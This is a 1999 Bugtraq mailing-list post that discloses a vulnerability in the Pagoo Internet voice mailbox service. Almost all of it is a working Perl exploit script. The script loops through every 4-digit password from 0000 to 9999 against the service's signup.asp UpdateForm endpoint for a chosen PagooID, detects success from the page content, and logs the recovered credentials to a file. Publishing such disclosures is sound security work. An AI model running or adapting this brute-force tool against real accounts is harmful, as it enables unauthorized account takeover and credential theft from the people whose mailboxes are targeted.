From bugtraq Tue Jun 22 17:06:05 1999 From: Elaich Of Hhp Date: Tue, 22 Jun 1999 17:06:05 +0000 To: bugtraq Subject: hhp: Pagoo VMB remote exploit. X-MARC-Message: https://marc.info/?l=bugtraq&m=93015856117594 #!/usr/bin/perl # # (hhp) hhp-pagoo.pl (hhp) # by: elaich of the hhp. # http://hhp.hemp.net/ # '99' # # The (Pagoo Internet voice MailBox) exploit. # Available at http://www.pagoo.com/ # # This exploit will extract the password to # the specified PagooID you specify. # # The vulnerability comes into play when you # connect to your UpdateForm thru signup.asp # which requires your PagooID and your 4 # digit password. # # Nothing will prevent you from reconnecting # and trying a new password from 0000 in # increments of 1 till we reach 9999 which # is the highest password possible... I # could call this a brute, but it always # 100% of the time will get the passwd # unlike a brute. # # Logs passwds to file: pagooids use IO::Socket; die "usage: $0 \n" unless(@ARGV == 1); ($box) = (@ARGV); open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n"; autoflush OUT 1; $host = "www.pagoo.com"; autoflush STDOUT 1; sub parse { ($num) = @_; $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num"; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => "tcp") or die "Can't connect.\n"; print $socket "GET $url\n"; print "Trying password: $num of 9999.\n"; while(<$socket>) { chomp; if(/Password invalid/) { break; } if(/First Name/) { print "PagooID password extracted...\n"; print "PagooID: $box / Password: $num\n"; print OUT "PagooID: $box / Password: $num\n"; exit 0; } } } $num = '0000'; parse $num; for($i = 0; $i <= 9999; $i++) { $num++; parse $num; }